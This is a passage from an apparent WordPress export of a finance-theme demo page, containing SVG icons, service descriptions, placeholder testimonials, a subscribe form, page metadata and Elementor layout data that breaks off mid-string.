c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></h5>				<p>Successful experience of experts in structuring investment projects, developing and implementing.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="107.869" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="148.639" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="189.409" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></h5>				<p>We are working in the format of an outsourcing project office. We assume operational coordination.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="107.869" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="148.639" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="189.409" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></h5>				<p>We are working in the format of an outsourcing project office. We assume operational coordination.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M509.07,194.061L414.3,99.29c-3.906-3.905-10.24-3.906-14.148,0c-3.906,3.906-3.906,10.24,0,14.148l87.697,87.696    l-51.274,51.273c-1.571,1.57-4.126,1.57-5.695,0l-101.25-101.249c-1.571-1.57-1.571-4.125,0-5.696l34.411-34.413    c3.906-3.906,3.906-10.24,0-14.147c-3.907-3.906-10.239-3.906-14.148,0l-34.411,34.411c-7.128,7.129-8.818,17.655-5.1,26.412    l-11.638,11.638h-44.877h-3.537h-32.955l-14.682-14.682c0.564-2.058,0.862-4.201,0.862-6.392c0-6.42-2.501-12.456-7.04-16.995    l-33.481-33.481c-3.907-3.906-10.239-3.906-14.148,0c-3.906,3.906-3.906,10.24,0,14.148l33.482,33.481    c1.026,1.026,1.18,2.225,1.18,2.847s-0.153,1.821-1.181,2.848l-2.786,2.786l-98.495,98.471c-0.032,0.032-0.059,0.067-0.09,0.099    c-0.998,0.923-2.128,1.073-2.727,1.073c-0.623,0-1.822-0.153-2.848-1.179L24.15,201.114l88.876-88.875    c3.906-3.906,3.906-10.24,0-14.147s-10.238-3.906-14.148,0L2.93,194.041c-3.906,3.906-3.906,10.24,0,14.147l58.346,58.347    c4.687,4.686,10.841,7.028,16.995,7.028c2.826,0,5.646-0.518,8.329-1.507l32.843,32.843c-2.55,4.784-4,10.237-4,16.025    c0,18.853,15.338,34.191,34.191,34.191c0.042,0,0.084-0.003,0.126-0.003c0,0.002,0,0.004,0,0.006    c0,18.811,15.269,34.119,34.064,34.188c0,0.015-0.001,0.029-0.001,0.044c0,18.853,15.338,34.191,34.191,34.191    c5.8,0,11.265-1.456,16.055-4.015l12.227,12.227c5.732,5.732,13.354,8.889,21.46,8.889c8.107,0,15.729-3.157,21.46-8.889    c5.427-5.427,8.546-12.548,8.862-20.171c7.393-0.368,14.678-3.368,20.311-9.002c5.952-5.952,9.166-13.866,9.051-22.282    c0-0.018-0.001-0.035-0.001-0.053c8.703-0.54,16.71-4.354,22.63-10.805c5.951-6.482,8.896-14.656,8.87-22.81    c8.37-0.241,16.201-3.613,22.146-9.559c6.202-6.201,9.603-14.447,9.573-23.218c-0.017-5.164-1.229-10.132-3.49-14.608l32.81-30    c4.115,2.876,8.927,4.335,13.749,4.335c6.154,0,12.309-2.343,16.995-7.027l58.346-58.347    C512.976,204.301,512.976,197.967,509.07,194.061z M149.635,335.11c-7.822,0-14.185-6.363-14.185-14.185    c0-7.821,6.363-14.184,14.185-14.184c7.822,0,14.185,6.363,14.185,14.184C163.819,328.747,157.456,335.11,149.635,335.11z     M194.516,364.551c-0.407,0.386-0.804,0.781-1.192,1.186c-2.503,2.212-5.779,3.567-9.373,3.567    c-7.821,0-14.184-6.363-14.184-14.185s6.362-14.185,14.184-14.185s14.185,6.363,14.185,14.185    C198.135,358.743,196.758,362.042,194.516,364.551z M228.18,399.225c-0.046,0.044-0.095,0.082-0.14,0.127    c-0.05,0.05-0.091,0.104-0.139,0.154c-2.557,2.491-6.043,4.032-9.885,4.032c-7.823-0.002-14.186-6.365-14.186-14.186    c0-3.623,1.376-6.922,3.619-9.431c0.407-0.386,0.804-0.781,1.192-1.186c2.502-2.212,5.779-3.566,9.373-3.566    c7.821,0,14.185,6.363,14.185,14.185C232.199,393.19,230.663,396.669,228.18,399.225z M366.94,322.927    c-2.395,2.394-5.577,3.712-8.963,3.712s-6.568-1.318-8.963-3.711l-20.782-20.783c-3.906-3.906-10.238-3.906-14.148,0    c-3.906,3.906-3.906,10.24,0,14.147l20.781,20.782c0.001,0,0.002,0.001,0.002,0.001l0.063,0.063    c5.157,5.156,5.333,13.402,0.401,18.774c-2.478,2.7-5.859,4.257-9.522,4.385c-3.655,0.135-7.145-1.188-9.805-3.707l-20.011-18.942    c-4.013-3.798-10.344-3.625-14.142,0.388c-3.798,4.012-3.625,10.343,0.387,14.142l21.787,20.625    c2.157,2.042,3.367,4.802,3.408,7.772c0.041,2.97-1.093,5.762-3.193,7.862c-4.251,4.253-11.173,4.252-15.424,0l-10.101-10.101    c-3.907-3.906-10.239-3.906-14.148,0c-1.953,1.954-2.93,4.513-2.93,7.073s0.977,5.121,2.93,7.073l10.5,10.5    c1.954,1.954,3.03,4.551,3.03,7.313s-1.076,5.36-3.03,7.313c-1.954,1.954-4.551,3.029-7.313,3.029    c-2.763,0-5.359-1.076-7.313-3.03l-12.235-12.235c2.548-4.782,3.997-10.233,3.997-16.019c0-18.811-15.27-34.119-34.065-34.188    c0-0.015,0.001-0.029,0.001-0.044c0-18.853-15.338-34.191-34.191-34.191c-0.042,0-0.083,0.003-0.125,0.003    c0-0.002,0-0.004,0-0.006c0-18.853-15.338-34.19-34.191-34.19c-5.798,0-11.261,1.455-16.049,4.012l-31.265-31.264l88.44-88.441    l15.399,15.4c1.877,1.876,4.421,2.93,7.073,2.93h12.948l-39.486,39.486c-6.037,6.037-9.361,14.065-9.361,22.603    c0,8.538,3.324,16.565,9.361,22.602c6.037,6.038,14.065,9.362,22.603,9.362s16.566-3.325,22.603-9.362l33.491-33.492l36.665,0.402    l64.825,63.967c2.422,2.39,3.762,5.58,3.772,8.982C370.665,317.322,369.346,320.52,366.94,322.927z M374.169,284.024    l-60.938-60.131c-0.001-0.001-0.002-0.002-0.003-0.003l-0.088-0.087c-2.25-2.221-5.287-3.151-8.201-2.808l-43.539-0.477    c-2.7-0.02-5.28,1.027-7.183,2.929l-36.467,36.468c-2.259,2.259-5.262,3.502-8.455,3.502s-6.196-1.243-8.455-3.502    c-2.259-2.258-3.502-5.261-3.502-8.455c0-3.194,1.243-6.197,3.502-8.456l53.633-53.633h48.416c2.653,0,5.197-1.054,7.073-2.93    l13.328-13.328l82.237,82.237L374.169,284.024z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="438.336" cy="205.74" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="72.644" cy="206.74" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="131.064" cy="82.139" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="380.757" cy="81.338" r="9.983"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">Support Functions</a></h5>				<p>Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M317.5,25.324H195.706c-18.813,0-34.118,15.305-34.118,34.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10V59.441    c0-7.784,6.333-14.117,14.118-14.117H317.5c7.785,0,14.118,6.333,14.118,14.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10    V59.441C351.618,40.628,336.313,25.324,317.5,25.324z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M463.178,106.118H48.822C21.901,106.118,0,128.019,0,154.94v88.801c0,4.433,2.919,8.337,7.171,9.592l6.093,1.797v209.488    c0,12.163,9.896,22.059,22.059,22.059h441.353c12.164,0,22.059-9.896,22.059-22.059V256.603l6.039-1.744    c4.279-1.236,7.226-5.153,7.226-9.607V154.94C512,128.019,490.099,106.118,463.178,106.118z M89.235,466.676H35.323    c-1.135,0-2.058-0.923-2.058-2.058v-53.912h28.76c15.004,0,27.21,12.207,27.21,27.21V466.676z M478.734,464.618    c0.001,1.135-0.922,2.058-2.058,2.058h-53.912v-28.76c0-15.004,12.207-27.21,27.21-27.21h28.76V464.618z M478.736,390.706h-0.001    h-28.76c-26.032,0-47.21,21.179-47.21,47.21v28.76h-293.53v-28.76c0-26.032-21.179-47.21-47.21-47.21h-28.76V261.029    L209.824,313.1v32.135c0,5.523,4.477,10,10,10h72.353c5.523,0,10-4.477,10-10v-31.868l176.559-50.988V390.706z M229.823,335.235    v-29.707c0-0.028,0-0.056,0-0.083V286.5h52.353v48.735H229.823z M492,237.731L302.176,292.55V276.5c0-5.523-4.477-10-10-10    h-72.353c-5.523,0-10,4.477-10,10v15.75L20,236.265V154.94c0-15.893,12.93-28.822,28.822-28.822h40.413v34.618    c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h289.912v34.618c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h44.031    c15.893,0,28.822,12.93,28.822,28.822V237.731z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="409.15" cy="199.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="99.23" cy="199.32" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">Finance Planning</a></h5>				<p>We identify the mission, goals and strategic priorities of a business project or non-profit organization.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/"class="link-details"> Learn More</a>
	        testimonials	        <h3>What People Say About Us</h3>	    
											<img src="https://maxbizz.s3.amazonaws.com/images/testi1.png" alt="Oliver Simson">
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Oliver Simson</h6>							client of company						
											<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Mary Grey</h6>							Manager						
											<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Samanta Fox</h6>							Designer						
			<h4>Ready to Get Started?</h4>		
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
<form action="/maxbizz-finance/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741" />
<input type="hidden" name="_wpcf7_version" value="5.3.2" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *" /><br />
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /><br />
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>885</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 10:16:54]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 10:16:54]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[services-with-icon]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"d5a76aa","elType":"section","settings":{"padding":{"unit":"px","top":"120","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"234f86e","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"1cf82f6","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"ce2318b","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"5510dd0","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"ef1670e","elType":"widget","settings":{"sub":"Improve Your Business","title":"We Offer Great<br> Number of Finance Services","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#95A2AC","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"9a1cf24","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"063a9d3","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"72f750e","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"849b54f","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bars-chart.svg","id":648},"library":"svg"},"title":"Marketing Research","des":"Analysis of the market as a whole and its particular components (competitor, consumer, product, etc.)","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/marketing-research\/","is_external":"","nofollow":"","custom_attributes":""},"icon_bg":"#52C5B633","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"bg_hover_des_color":"#FFFFFF","bg_hover_box":"#061E2F"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"c431466","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"e0e8d01","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/rocket.svg","id":649},"library":"svg"},"title":"Organizational Audit","des":"Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":40,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""},"icon_bg":"#52C5B633","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"bg_hover_des_color":"#FFFFFF","bg_hover_box":"#061E2F"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"2269d28","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[{"id":"56e56e3","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/hourglass.svg","id":1872},"library":"svg"},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/business-consulting\/","is_external":"","nofollow":"","custom_attributes":""},"icon_bg":"#52C5B633","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"bg_hover_des_color":"#FFFFFF","bg_hover_box":"#061E2F"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true},{"id":"390869d","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"hide_desktop":"hidden-desktop","layout":"full_width"},"elements":[{"id":"075d0cf","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"4bdc329","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.